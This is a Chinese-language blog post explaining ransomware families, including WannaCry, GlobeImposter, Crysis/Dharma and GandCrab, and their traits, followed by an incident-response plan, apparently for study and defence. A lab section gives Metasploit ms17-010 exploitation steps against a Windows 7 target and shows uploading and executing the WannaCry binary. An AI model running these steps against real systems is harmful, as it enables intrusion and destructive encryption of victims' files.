勒索病毒是什么

程序木马、网页挂马等形式进行传播,勒索病毒,是一种电脑病毒该丰要门病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。

勒索病毒通常使用非对称和对称加密算法组合的形式来加密文件,绝大部分勒索病毒均无法通过技术手段解密,一般无法溯源,危害巨大。

常见勒索病毒——WannaCry

2017年5月12日WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入勒索病毒,导致电脑大量文件被加密。受害者电脑被黑客锁定后,病毒会提示支付价值相当于300美元)(约合人民币2069元)的比特市才可解锁。

WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件,大小3.3MB,由不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。

WannaCry勒索病毒全球大爆发,至少150个国家、30万名用户中招,造成损失达80亿美元已经影响到金融,能源,医疗等众多行业,造成严重的危机管理问题。

特征

常见后缀名:wncny

传播方式:“永恒之蓝”漏洞

特征:启动时会连接一个不存在的URL创建系统服务mssecsvc2.0,释放路径为windows目录

常见勒索病毒——Globelmposter

Globelmposter 勒索病毒寸 2017年5月首次出现,主要通达方式传播

自2018年8月21日起,多地发生Globelmposter勒索病毒事件,此次攻击目标主要是开启远程桌面服务的服务器,攻击者通过暴力破解服务器密码,对内网服务器发起扫描并人工投放勒索病毒,导致文件被加密,暂时无法解密

特征

常见后缀名:auchentoshan、动物名+4444

传播方法:RDP 暴力破解、钓鱼邮件、捆绑软件

特征:释放在 %appdata%或%localappdata%

常见勒索病毒——Crysis/Dharma

Crysis/Dharma 勒索病毒最早出现在 2016年,2017年5月在万能密钥被公布之后,消失了一段时间,但在 2017年6月开始继续更新。攻击方法同样是通过远程 RDP暴力破解的方式植入用户的服务器进行攻击。由于采用 AES+RSA 的加密方式,其最新版本无法解密。

特征

常见后缀:id+勒索邮箱+特定后缀

传播方式:RDP 暴力破解

特征:勒索信位置在 startup 目录;样本位置在 %windir%System32、startup目录、%appdata% 目录

常见勒索病毒——GandCrab

GandCrab勒索病毒于2018年1月面世以来,一年内经多次版本更新因前最新的版本为V5该病毒利用多种方式对企业网络进行攻击传播,受感染主机的数据库、图片、压缩包、文档等文件将被加密,若没有相应数据或文件的备份将会影响业务的正常运行。

病毒采用Salsa20和RSA-2048算法对文件进行加密,并修改文件后为.GDCB、.GRAB、.KRAB或5-10位随机字母,勒索信息文件为GDCB-DECRYPT.txt、KRAB-DECRYPT.txt、[5-10随机字母]-DECRYPT.htmItxt,并将感染主机桌面背景替换为勒索信息图片。

特征

常见后缀:随机生成

传播方式:RDP暴力破解、钓鱼邮件、捆绑软件、僵尸网络、漏洞传播等

特征:样本执行完毕后自动删除,并会修改感染主机桌面背景,有后缀MANUALtxt、DECRYPT.txt

解密方式

解密方法 难度系数
入侵攻击者的服务器获取非对称加密的私钥,用非对称加密的私钥解密经过非对称加密公钥加密后的对称加密密钥,进而解密文件数据
勒索病毒加密算法设计存在问题,比如2018年“微信支付“勒索病毒高加密密钥存放在本地,所以很快就被破解
暴力破解
支付赎金下载特定的解密器

在kali模拟

目标机:win7

1 启动msf

    msfconsole

2 搜索相关模块

    search ms17-010

    use 0

3 配置参数

    options    //查看相关参数

    set rhost 目标主机ip

4 开始攻击

    run

    whoami   

5 上传病毒

    ls

    unzip

    ls -i    //发现文件id

    find -inum id -exec unzip {} \;

    ls

    mv wcry.exe_ wcey.exe    //解压成功

    help

    upload /root/test/wcry.exe

    pwd

    execute -f wcry.exe

6 查看病毒是否运行

    ps -ef | grep wcry.exe

应急响应方案

0 数据备份

1 事件判断

    什么漏洞、什么问题

2 临时处置

    禁止使用U盘、移动硬盘

3 信息收集与分析

    样本分析

    文件排查、exe排查、网络排查netstat -ano

4 事件处置

    通过PID查看程序执行目录:wmic process where processid=2984 get name,executablepath

    查看可疑IP地址:87.236.194.23、159.68.207.20、176.31.163.89

    微步在线:https://xthreabook.cn/

5 事件抑制

    1、隔离问题主机,断开网络连接,尽量关闭外部连接

    2、将135,139,445端口关闭,封堵非业务端口

    3、将服务器/主机密码全部更改为复杂的高强度的密码

    4、安装安全补丁,尤其是 MS17-010 漏洞的补丁

6 根除与恢复

    1、终端安装企业级防病毒软件

    2、使用流量监控设备进行内网流量监控

    3、出口防火墙封堵可疑地址

许可协议

本文由FlowsecNagi编写,采用非商业性使用-相同方式共享 4.0 国际](https://creativecommons.org/licenses/by-nc-sa/4.0/) 许可协议,转载请注明出处。

快来参与讨论吧~